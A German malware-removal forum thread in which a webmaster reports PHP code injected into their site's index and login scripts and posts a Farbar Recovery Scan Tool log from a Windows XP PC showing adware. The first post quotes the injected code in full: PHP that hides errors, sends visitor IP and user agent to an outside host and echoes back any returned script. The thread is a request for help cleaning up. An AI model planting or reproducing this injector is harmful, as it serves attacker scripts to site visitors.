Zurück   Trojaner-Board > Malware entfernen > Plagegeister aller Art und deren Bekämpfung

Plagegeister aller Art und deren Bekämpfung: Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt

Windows 7 Wenn Du nicht sicher bist, ob Du dir Malware oder Trojaner eingefangen hast, erstelle hier ein Thema. Ein Experte wird sich mit weiteren Anweisungen melden und Dir helfen die Malware zu entfernen oder Unerwünschte Software zu deinstallieren bzw. zu löschen. Bitte schildere dein Problem so genau wie möglich. Sollte es ein Trojaner oder Viren Problem sein wird ein Experte Dir bei der Beseitigug der Infektion helfen.

Antwort
Alt 15.06.2014, 08:49   #1
Metallica81
 
Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt - Standard

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt



Hallo,

Ich habe von meinem Hosting-Provider eine E-Mail erhalten, dass bei einem routinemäßigen Virenscan Dateien mit Schadcode gefunden wurden.

Betroffen sind nach näherer Analyse alle PHP-Skripte auf meiner Homepage, die entweder das Schlüsselwort index oder login im Dateinamen beinhalten.

Laut meinem Provider sind 2 mögliche Ursachen denkbar:
1) Sicherheitslücken in oft nicht aktualisierten Scripten wie CMS, Shop, Forum, Gästebücher usw.
2) Befall mit Schadcode auf dem PC, mit dem die Webseite bearbeitet wurde.

Die Webseite (von einem Verein) bearbeite ausschließlich ich - also wäre im Fall 2 wohl mein PC betroffen.

In den betroffenen Seiten habe ich tatsächlich Code gefunden, der definitiv nicht von mir stammt und ans unveränderte Ende meines Codes angehängt wurde:

Option 1 (Sicherheitslücken in Skripten) halte ich für nicht so realistisch, da keine der betroffenen Dateien Formulare mit Eingabemöglichkeiten für den Benutzer beihalteten.
Das Gästebuch (einzige Eingabemöglichkeit) war nicht betroffen.
Einige der veränderten Seiten liegen zudem in geschützten Bereichen.

Ich halte es für wahrscheinlicher, dass jemand automatisiert (ansonsten wäre denke ich kein Muster bei den Dateinamen erkennbar) direkt über den FTP-Account die betroffenen PHP-Skripte verändert hat.

Ein Beispiel für den hinzugefügten Code:
Zitat:
<?php
#19f955#
error_reporting(0); ini_set('display_errors',0); $wp_cmz97977 = @$_SERVER['HTTP_USER_AGENT'];
if (( preg_match ('/Gecko|MSIE/i', $wp_cmz97977) && !preg_match ('/bot/i', $wp_cmz97977))){
$wp_cmz0997977="hxxp://"."http"."href".".com/href"."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_cmz97977);
$ch = curl_init(); curl_setopt ($ch, CURLOPT_URL,$wp_cmz0997977);
curl_setopt ($ch, CURLOPT_TIMEOUT, 6); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $wp_97977cmz = curl_exec ($ch); curl_close($ch);}
if ( substr($wp_97977cmz,1,3) === 'scr' ){ echo $wp_97977cmz; }
#/19f955#
?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
<?php

?>
Mir fallen 3 Möglichkeiten ein wie das passieren kann:
1) Provider wurde gehacked so dass Angreifer Zugriff auf die kompletten Webserver haben (in meinen Augen unwahrscheinlich, da andere Seiten die ich beim gleichen Provider hoste nicht betroffen sind)
2) Jemand hat die Zugangsdaten zu meinem FTP-Account "erraten"
3) Ich habe einen Trojaner auf meinem Rechner, über den jemand die Zugangsdaten ausgespäht hat

Ich habe einen Virenscan mit aktuellster Kaspersky-Version laufen lassen - nichts gefunden.
Zusätzlich ahbe ich einmal Trojan Remover laufen lassen - da wurde einiges an AdWare umbenannt, aber Hinweise auf einen Trojaner konnte ich auch da nicht finden.

Der erste Schritt wäre nun ja erst mal das Passwort für den FTP-Account zu ändern, aber das macht denke ich ja nur Sinn, wenn sichergestellt ist, dass das geänderte Passowrt nicht gleich wieder ausgespäht wird.

Reichen Kaspersky und Trojan Remover aus, um sicherzustellen, dass ich keinen Trojaner habe?

Oder wäre es generell ratsam, zur Sicherheit den ganzen PC platt zu machen?

Können eigentlich "normale" Dateien (Dokumente wie Word, Excel, PPT, Videodateien, Bilder, ...) auch von einem möglichen Trojaner infiziert sein?
Oder legt sich ein Trojaner gewöhnlich eher in andere Dateien (Betriebssystem-Dateien, ...) so dass ich bedenkenlos nochmal die wichtigsten Dateien auf eine Festplatte ziehen könnte falls ich den Rechner neu installieren muss?
(Hintergrund: mein letztes Datei-Backup ist erstens 2-3 Wochen alt und somit würde etwas verloren gehen, und außerdem kann ich ja nicht sagen, ob ich vor diesen 2-3 Wochen bereits den Trojaner hatte)

Viele Grüße,
Metallica81

Alt 15.06.2014, 12:06   #2
schrauber
/// the machine
/// TB-Ausbilder
 

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt - Standard

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt



hi,

Bitte lade dir die passende Version von Farbar's Recovery Scan Tool auf deinen Desktop: FRST Download FRST 32-Bit | FRST 64-Bit
(Wenn du nicht sicher bist: Lade beide Versionen oder unter Start > Computer (Rechtsklick) > Eigenschaften nachschauen)
  • Starte jetzt FRST.
  • Ändere ungefragt keine der Checkboxen und klicke auf Untersuchen.
  • Die Logdateien werden nun erstellt und befinden sich danach auf deinem Desktop.
  • Poste mir die FRST.txt und nach dem ersten Scan auch die Addition.txt in deinem Thread (#-Symbol im Eingabefenster der Webseite anklicken)

__________________

__________________

Alt 15.06.2014, 12:35   #3
Metallica81
 
Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt - Standard

Schädlicher Quellcode in PHP-Dateien auf FTP-Server hinzugefügt



Hallo,

Ist erledigt.

Hier die FRST.txt von meinem normalen Windows-Account, mit dem ich auch den FTP-Zugang verwende:


FRST Logfile:
Code:
ATTFilter
Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:12-06-2014 02
Ran by Username (ATTENTION: The logged in user is not administrator) on PC_TG on 15-06-2014 13:12:13
Running from C:\Dokumente und Einstellungen\Username\Desktop
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: German Standard
Internet Explorer Version 8
Boot Mode: Normal



==================== Processes (Whitelisted) =================

(Kaspersky Lab ZAO) C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avpui.exe
(Synaptics, Inc.) C:\Programme\Synaptics\SynTP\SynTPEnh.exe
(Wistron) C:\Programme\Launch Manager\HotkeyApp.exe
(Intel Corporation) C:\WINDOWS\system32\igfxtray.exe
(Intel Corporation) C:\WINDOWS\system32\hkcmd.exe
(Intel Corporation) C:\WINDOWS\system32\igfxpers.exe
(Intel Corporation) C:\WINDOWS\system32\igfxsrvc.exe
(4G Systems GmbH & Co. KG) C:\WINDOWS\starter4g.exe
(Nokia) C:\Programme\Nokia\Nokia Suite\NokiaSuite.exe
(Panasonic Corporation) C:\Programme\Gemeinsame Dateien\Panasonic\HD Writer AutoStart\HDWriterAutoStart.exe
(WinZip Computing, Inc.) C:\Programme\WinZip\WZQKPICK.EXE
(Mozilla Corporation) C:\Programme\Mozilla Firefox\firefox.exe
(Mozilla Corporation) C:\Programme\Mozilla Firefox\plugin-container.exe
(Microsoft Corporation) C:\Programme\Office\Office12\OUTLOOK.EXE


==================== Registry (Whitelisted) ==================

HKLM\...\Run: [SynTPEnh] => C:\Programme\Synaptics\SynTP\SynTPEnh.exe [815104 2006-10-23] (Synaptics, Inc.)
HKLM\...\Run: [HotkeyApp] => C:\Programme\Launch Manager\HotkeyApp.exe [192512 2007-04-26] (Wistron)
HKLM\...\Run: [CtrlVol] => C:\Programme\Launch Manager\CtrlVol.exe
HKLM\...\Run: [LaunchAp] => C:\Programme\Launch Manager\LaunchAp.exe
HKLM\...\Run: [Wbutton] => C:\Programme\Launch Manager\WButton.exe
HKLM\...\Run: [NeroFilterCheck] => C:\Programme\Gemeinsame Dateien\Ahead\Lib\NeroCheck.exe [155648 2006-01-12] (Nero AG)
HKLM\...\Run: [starter4g] => C:\WINDOWS\starter4g.exe [160424 2010-04-30] (4G Systems GmbH & Co. KG)
HKLM\...\Run: [SunJavaUpdateSched] => C:\Programme\Gemeinsame Dateien\Java\Java Update\jusched.exe [252848 2012-07-03] (Sun Microsystems, Inc.)
HKLM\...\Run: [TrojanScanner] => C:\Programme\Trojan Remover\Trjscan.exe [1666432 2014-06-15] (Simply Super Software)
Winlogon\Notify\klogon: C:\WINDOWS\system32\klogon.dll (Kaspersky Lab ZAO)
HKU\S-1-5-21-232585097-4284014186-598723593-1005\...\Run: [NokiaSuite.exe] => C:\Programme\Nokia\Nokia Suite\NokiaSuite.exe [1090040 2012-12-21] (Nokia)
HKU\S-1-5-21-232585097-4284014186-598723593-1005\...\MountPoints2: {f79edcd1-a4f2-11e1-b47b-0016d3855058} - F:\autorun.exe
Startup: C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\Adobe Reader - Schnellstart.lnk
ShortcutTarget: Adobe Reader - Schnellstart.lnk -> C:\Programme\Adobe\Acrobat 7.0\Reader\reader_sl.exe (Adobe Systems Incorporated)
Startup: C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\HD Writer.lnk
ShortcutTarget: HD Writer.lnk -> C:\Programme\Gemeinsame Dateien\Panasonic\HD Writer AutoStart\HDWriterAutoStart.exe (Panasonic Corporation)
Startup: C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Autostart\WinZip Quick Pick.lnk
ShortcutTarget: WinZip Quick Pick.lnk -> C:\Programme\WinZip\WZQKPICK.EXE (WinZip Computing, Inc.)

==================== Internet (Whitelisted) ====================

HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll (Adobe Systems Incorporated)
BHO: Content Blocker Plugin - {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)
BHO: Virtual Keyboard Plugin - {73455575-E40C-433C-9784-C78DC7761455} - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)
BHO: Java(tm) Plug-In SSV Helper - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Programme\Java\jre7\bin\ssv.dll (Oracle Corporation)
BHO: Safe Money Plugin - {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)
BHO: Lyrics-Pal - {C8FBE488-BAF5-4019-A7F7-C888045987D3} - C:\Programme\LyricsPal\116.dll (LyricsPal Soft. LTD)
BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre7\bin\jp2ssv.dll (Oracle Corporation)
BHO: URL Advisor Plugin - {E33CF602-D945-461A-83F0-819F76A199F8} - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)
BHO: Softonic Helper Object - {E87806B5-E908-45FD-AF5E-957D83E58E68} - C:\Programme\Softonic\Softonic\1.6.7.4\bh\Softonic.dll (Softonic.com)
BHO: Yontoo - {FD72061E-9FDE-484D-A58A-0BAB4151CAD8} - C:\Programme\Yontoo\YontooIEClient.dll (Yontoo LLC)
Toolbar: HKLM - Softonic Toolbar - {5018CFD2-804D-4C99-9F81-25EAEA2769DE} - C:\Programme\Softonic\Softonic\1.6.7.4\SoftonicTlbr.dll (Softonic.com)
DPF: {8AD9C840-044E-11D1-B3E9-00805F499D93} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_31-windows-i586.cab
DPF: {CAFEEFAC-0016-0000-0031-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_31-windows-i586.cab
DPF: {CAFEEFAC-FFFF-FFFF-FFFF-ABCDEFFEDCBA} hxxp://java.sun.com/update/1.6.0/jinstall-1_6_0_31-windows-i586.cab
Handler: http\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler: http\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler: https\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler: https\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler: ipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler: ms-help - {314111c7-a502-11d2-bbca-00c04f8ec294} - C:\Programme\Gemeinsame Dateien\Microsoft Shared\Help\hxds.dll (Microsoft Corporation)
Handler: msdaipp\0x00000001 - {E1D2BF42-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Handler: msdaipp\oledb - {E1D2BF40-A96B-11d1-9C6B-0000F875AC61} - C:\Programme\Gemeinsame Dateien\System\Ole DB\MSDAIPP.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.2.1

FireFox:
========
FF ProfilePath: C:\Dokumente und Einstellungen\Username\Anwendungsdaten\Mozilla\Firefox\Profiles\2lwkt3c8.default
FF Homepage: hxxp://www.box-manager.com/
FF Plugin: @adobe.com/FlashPlayer - C:\WINDOWS\system32\Macromed\Flash\NPSWF32.dll ()
FF Plugin: @java.com/DTPlugin,version=10.9.2 - C:\WINDOWS\system32\npDeployJava1.dll (Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.9.2 - C:\Programme\Java\jre7\bin\plugin2\npjp2.dll (Oracle Corporation)
FF Plugin: @microsoft.com/OfficeLive,version=1.5 - C:\Programme\Microsoft\Office Live\npOLW.dll (Microsoft Corp.)
FF Plugin: @microsoft.com/WPF,version=3.5 - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\NPWPF.dll (Microsoft Corporation)
FF Plugin: @nokia.com/EnablerPlugin - C:\Programme\Nokia\Nokia Suite\npNokiaSuiteEnabler.dll ( )
FF Plugin HKCU: amazon.com/AmazonMP3DownloaderPlugin - C:\Dokumente und Einstellungen\Username\Lokale Einstellungen\Program Files\Amazon\MP3 Downloader\npAmazonMP3DownloaderPlugin101721.dll (Amazon.com, Inc.)
FF SearchPlugin: C:\Programme\mozilla firefox\searchplugins\amazondotcom-de.xml
FF SearchPlugin: C:\Programme\mozilla firefox\searchplugins\eBay-de.xml
FF SearchPlugin: C:\Programme\mozilla firefox\searchplugins\leo_ende_de.xml
FF SearchPlugin: C:\Programme\mozilla firefox\searchplugins\yahoo-de.xml
FF HKLM\...\Firefox\Extensions: [{20a82645-c095-46ed-80e3-08825760534b}] - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\
FF Extension: Microsoft .NET Framework Assistant - c:\WINDOWS\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension\ []
FF HKLM\...\Firefox\Extensions:  - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com
FF Extension: 卡巴斯基網址顧問 - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\url_advisor@kaspersky.com [2014-06-14]
FF HKLM\...\Firefox\Extensions: [virtual_keyboard@kaspersky.com] - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com
FF Extension: 虛擬鍵盤 - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\virtual_keyboard@kaspersky.com [2014-06-14]
FF HKLM\...\Firefox\Extensions: [content_blocker@kaspersky.com] - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com
FF Extension: 惡意網站攔截器 - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\content_blocker@kaspersky.com [2014-06-14]
FF HKLM\...\Firefox\Extensions: [anti_banner@kaspersky.com] - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com
FF Extension: Chặn quảng cáo - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\anti_banner@kaspersky.com [2014-06-14]
FF HKLM\...\Firefox\Extensions: [online_banking@kaspersky.com] - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com
FF Extension: Safe Money - C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\FFExt\online_banking@kaspersky.com [2014-06-14]

========================== Services (Whitelisted) =================

Locked "TlntSvr" service could not be unlocked. <===== ATTENTION
Locked "WmiApRpl" service could not be unlocked. <===== ATTENTION

R2 AVP; C:\Programme\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe [214512 2014-05-28] (Kaspersky Lab ZAO)
R2 JavaQuickStarterService; C:\Programme\Java\jre7\bin\jqs.exe [161768 2012-12-12] (Oracle Corporation)
S3 odserv; C:\Programme\Gemeinsame Dateien\Microsoft Shared\OFFICE12\ODSERV.EXE [440696 2011-07-20] (Microsoft Corporation)
S3 ose; C:\Programme\Gemeinsame Dateien\Microsoft Shared\Source Engine\OSE.EXE [145184 2006-10-26] (Microsoft Corporation)
R3 ServiceLayer; C:\Programme\PC Connectivity Solution\ServiceLayer.exe [732648 2012-12-19] (Nokia)
R3 WisLMSvc; C:\Programme\Launch Manager\WisLMSvc.exe [118784 2006-11-17] (Wistron Corp.) [File not signed]
R2 WTGService; C:\Programme\XSManager\WTGService.exe [329168 2010-04-12] ()
R2 XS Stick Service; C:\WINDOWS\service4g.exe [145064 2010-04-30] (4G Systems GmbH & Co. KG)
S2 CltMngSvc; C:\PROGRA~1\SearchProtect\Main\bin\CltMngSvc.exe [X]

==================== Drivers (Whitelisted) ====================

S4 abp480n5; C:\WINDOWS\system32\DRIVERS\ABP480N5.SYS [23552 2001-08-17] (Microsoft Corporation)
S3 CCDECODE; C:\WINDOWS\System32\DRIVERS\CCDECODE.sys [17024 2008-04-13] (Microsoft Corporation)
S3 cmnsusbser; C:\WINDOWS\System32\DRIVERS\cmnsusbser.sys [103424 2012-05-23] (Mobile Connector)
S3 FETNDIS; C:\WINDOWS\System32\DRIVERS\fetnd5.sys [27165 2001-08-17] (VIA Technologies, Inc.              )
R3 HdAudAddService; C:\WINDOWS\System32\drivers\CHDAud.sys [630272 2007-05-01] (Conexant Systems Inc.)
R1 Hotkey; C:\WINDOWS\system32\Drivers\Hotkey.sys [9867 2003-04-28] () [File not signed]
R0 kl1; C:\WINDOWS\System32\DRIVERS\kl1.sys [135776 2014-05-28] (Kaspersky Lab ZAO)
R1 KLIF; C:\WINDOWS\System32\DRIVERS\klif.sys [576096 2014-05-28] (Kaspersky Lab ZAO)
R3 klim5; C:\WINDOWS\System32\DRIVERS\klim5.sys [36448 2013-04-19] (Kaspersky Lab ZAO)
R3 klkbdflt; C:\WINDOWS\System32\DRIVERS\klkbdflt.sys [24672 2014-05-28] (Kaspersky Lab ZAO)
R3 klmouflt; C:\WINDOWS\System32\DRIVERS\klmouflt.sys [24672 2014-05-28] (Kaspersky Lab ZAO)
R1 klpd; C:\WINDOWS\System32\DRIVERS\klpd.sys [14432 2013-04-12] (Kaspersky Lab ZAO)
R1 kltdi; C:\WINDOWS\System32\DRIVERS\kltdi.sys [45024 2013-05-14] (Kaspersky Lab ZAO)
R1 kneps; C:\WINDOWS\System32\DRIVERS\kneps.sys [144992 2014-05-28] (Kaspersky Lab ZAO)
S3 NdisIP; C:\WINDOWS\System32\DRIVERS\NdisIP.sys [10880 2008-04-13] (Microsoft Corporation)
R3 NETw4x32; C:\WINDOWS\System32\DRIVERS\NETw4x32.sys [2203520 2007-02-25] (Intel Corporation)
R0 PxHelp20; C:\WINDOWS\System32\Drivers\PxHelp20.sys [45744 2011-10-04] (Rovi Corporation)
S3 S3SavageNB; C:\WINDOWS\System32\DRIVERS\s3gnbm.sys [166912 2004-08-03] (S3 Graphics, Inc.)
U5 klflt; C:\Windows\System32\Drivers\klflt.sys [93792 2014-05-28] (Kaspersky Lab ZAO)
S1 mailKmd; No ImagePath
U5 ScsiPort; C:\WINDOWS\system32\drivers\scsiport.sys [96384 2008-04-13] (Microsoft Corporation)
U1 WS2IFSL; 

==================== NetSvcs (Whitelisted) ===================


==================== One Month Created Files and Folders ========

2014-06-15 13:12 - 2014-06-15 13:12 - 00013894 _____ () C:\Dokumente und Einstellungen\Username\Desktop\FRST.txt
2014-06-15 13:12 - 2014-06-15 13:12 - 00000000 ____D () C:\FRST
2014-06-15 13:10 - 2014-06-15 13:09 - 01073152 _____ (Farbar) C:\Dokumente und Einstellungen\Username\Desktop\FRST.exe
2014-06-15 09:37 - 2014-06-15 09:37 - 00001484 _____ () C:\Dokumente und Einstellungen\Username\.recently-used.xbel
2014-06-15 09:07 - 2014-06-15 09:07 - 00000000 ____D () C:\Dokumente und Einstellungen\Username\Anwendungsdaten\Simply Super Software
2014-06-15 09:06 - 2014-06-15 09:06 - 00000000 ____D () C:\Dokumente und Einstellungen\Username\Eigene Dateien\Simply Super Software
2014-06-15 08:40 - 2014-06-15 09:19 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TEMP
2014-06-15 08:40 - 2014-06-15 08:40 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Licenses
2014-06-15 08:35 - 2014-06-15 08:36 - 00000000 ____D () C:\Programme\Trojan Remover
2014-06-15 08:35 - 2014-06-15 08:35 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Trojan Remover
2014-06-15 08:35 - 2014-06-15 08:35 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Simply Super Software
2014-06-15 08:35 - 2012-06-15 15:39 - 00169744 _____ () C:\WINDOWS\system32\ztvunrar36.dll
2014-06-15 08:35 - 2012-06-15 15:35 - 00185616 _____ () C:\WINDOWS\system32\ztvunrar39.dll
2014-06-15 08:35 - 2012-06-15 15:33 - 00605968 _____ (Igor Pavlov) C:\WINDOWS\system32\ztv7z.dll
2014-06-15 08:35 - 2012-06-15 15:33 - 00077072 _____ (Microsoft Corporation) C:\WINDOWS\system32\ztvcabinet.dll
2014-06-15 08:35 - 2005-08-26 00:50 - 00077312 _____ () C:\WINDOWS\system32\ztvunace26.dll
2014-06-15 08:35 - 2003-02-02 19:06 - 00153088 _____ () C:\WINDOWS\system32\UNRAR3.dll
2014-06-15 08:35 - 2002-03-06 00:00 - 00075264 _____ () C:\WINDOWS\system32\unacev2.dll
2014-06-15 08:34 - 2014-06-15 08:34 - 00000000 ____D () C:\Dokumente und Einstellungen\Default User\Lokale Einstellungen\Anwendungsdaten\SearchProtect
2014-06-15 00:34 - 2014-06-15 00:34 - 00000000 __HDC () C:\WINDOWS\$NtUninstallKB2922229$
2014-06-15 00:27 - 2014-06-15 00:32 - 00006557 _____ () C:\WINDOWS\KB2964358-IE8.log
2014-06-15 00:27 - 2014-06-15 00:27 - 00000000 ____D () C:\Programme\Gemeinsame Dateien\DESIGNER
2014-06-14 22:47 - 2014-06-14 22:47 - 00001941 _____ () C:\Dokumente und Einstellungen\Username\Desktop\Sicherer Zahlungsverkehr.lnk
2014-06-14 22:35 - 2014-06-15 01:19 - 00000664 _____ () C:\WINDOWS\system32\d3d9caps.dat
2014-06-14 22:27 - 2014-06-15 09:06 - 00000396 _____ () C:\WINDOWS\Tasks\Opera scheduled Autoupdate 1395589487.job
2014-06-14 22:23 - 2014-06-14 22:23 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Kaspersky Internet Security
2014-06-14 22:23 - 2014-06-14 22:22 - 00000847 _____ () C:\Dokumente und Einstellungen\All Users\Desktop\Kaspersky Internet Security.lnk
2014-06-14 22:21 - 2014-06-15 09:06 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Kaspersky Lab
2014-06-14 22:21 - 2014-06-14 22:21 - 00000000 ____D () C:\Programme\Kaspersky Lab
2014-06-14 22:21 - 2014-05-28 16:38 - 00576096 _____ (Kaspersky Lab ZAO) C:\WINDOWS\system32\Drivers\klif.sys
2014-06-14 22:21 - 2014-05-28 16:38 - 00093792 _____ (Kaspersky Lab ZAO) C:\WINDOWS\system32\Drivers\klflt.sys
2014-05-28 16:38 - 2014-05-28 16:38 - 00144992 _____ (Kaspersky Lab ZAO) C:\WINDOWS\system32\Drivers\kneps.sys
2014-05-28 16:38 - 2014-05-28 16:38 - 00135776 _____ (Kaspersky Lab ZAO) C:\WINDOWS\system32\Drivers\kl1.sys
2014-05-28 16:38 - 2014-05-28 16:38 - 00024672 _____ (Kaspersky Lab ZAO) C:\WINDOWS\system32\Drivers\klmouflt.sys
2014-05-28 16:38 - 2014-05-28 16:38 - 00024672 _____ (Kaspersky Lab ZAO) C:\WINDOWS\system32\Drivers\klkbdflt.sys

==================== One Month Modified Files and Folders =======

2014-06-15 13:12 - 2014-06-15 13:12 - 00013894 _____ () C:\Dokumente und Einstellungen\Username\Desktop\FRST.txt
2014-06-15 13:12 - 2014-06-15 13:12 - 00000000 ____D () C:\FRST
2014-06-15 13:12 - 2012-02-14 21:44 - 00000000 ____D () C:\Dokumente und Einstellungen\Username\Lokale Einstellungen\Temp
2014-06-15 13:09 - 2014-06-15 13:10 - 01073152 _____ (Farbar) C:\Dokumente und Einstellungen\Username\Desktop\FRST.exe
2014-06-15 09:50 - 2012-02-14 23:54 - 00000000 ____D () C:\Dokumente und Einstellungen\Username\Eigene Dateien\Tmp
2014-06-15 09:37 - 2014-06-15 09:37 - 00001484 _____ () C:\Dokumente und Einstellungen\Username\.recently-used.xbel
2014-06-15 09:37 - 2012-02-14 21:44 - 00000000 ____D () C:\Dokumente und Einstellungen\Username
2014-06-15 09:19 - 2014-06-15 08:40 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\TEMP
2014-06-15 09:07 - 2014-06-15 09:07 - 00000000 ____D () C:\Dokumente und Einstellungen\Username\Anwendungsdaten\Simply Super Software
2014-06-15 09:06 - 2014-06-15 09:06 - 00000000 ____D () C:\Dokumente und Einstellungen\Username\Eigene Dateien\Simply Super Software
2014-06-15 09:06 - 2014-06-14 22:27 - 00000396 _____ () C:\WINDOWS\Tasks\Opera scheduled Autoupdate 1395589487.job
2014-06-15 09:06 - 2014-06-14 22:21 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Kaspersky Lab
2014-06-15 09:06 - 2014-03-23 17:38 - 00000226 _____ () C:\WINDOWS\Tasks\Ende des Supports für Microsoft Windows XP –  Benachrichtigung – Anmeldung.job
2014-06-15 09:06 - 2013-07-10 18:18 - 00000338 _____ () C:\WINDOWS\Tasks\Lyrics-Pal Update.job
2014-06-15 08:59 - 2007-07-24 18:46 - 00001158 _____ () C:\WINDOWS\system32\wpa.dbl
2014-06-15 08:58 - 2007-07-24 19:01 - 01976038 _____ () C:\WINDOWS\WindowsUpdate.log
2014-06-15 08:57 - 2007-07-24 19:57 - 00000159 _____ () C:\WINDOWS\wiadebug.log
2014-06-15 08:57 - 2007-07-24 19:57 - 00000050 _____ () C:\WINDOWS\wiaservc.log
2014-06-15 08:57 - 2007-07-24 19:08 - 00000006 ____H () C:\WINDOWS\Tasks\SA.DAT
2014-06-15 08:56 - 2012-02-14 21:44 - 00000190 ___SH () C:\Dokumente und Einstellungen\Username\ntuser.ini
2014-06-15 08:56 - 2007-07-24 19:08 - 00032586 _____ () C:\WINDOWS\SchedLgU.Txt
2014-06-15 08:40 - 2014-06-15 08:40 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Licenses
2014-06-15 08:36 - 2014-06-15 08:35 - 00000000 ____D () C:\Programme\Trojan Remover
2014-06-15 08:35 - 2014-06-15 08:35 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme\Trojan Remover
2014-06-15 08:35 - 2014-06-15 08:35 - 00000000 ____D () C:\Dokumente und Einstellungen\All Users\Anwendungsdaten\Simply Super Software
2014-06-15 08:35 - 2007-07-25 06:19 - 00000000 ___RD () C:\Programme
2014-06-15 08:35 - 2007-07-25 06:18 - 00000000 ___RD () C:\Dokumente und Einstellungen\All Users\Startmenü\Programme
2014-06-15 08:34 - 2014-06-15 08:34 - 00000000 ____D () C:\Dokumente und Einstellungen\Default User\Lokale Einstellungen\Anwendungsdaten\SearchProtect
2014-06-15 08:09 - 2012-02-24 20:29 - 00000000 ____D () C:\Dokumente und Einstellungen\Username\Anwendungsdaten\gtk-2.0
2014-06-15 03:38 - 2012-02-14 21:56 - 00000000 ____D () C:\Dokumente und Einstellungen\Gengler
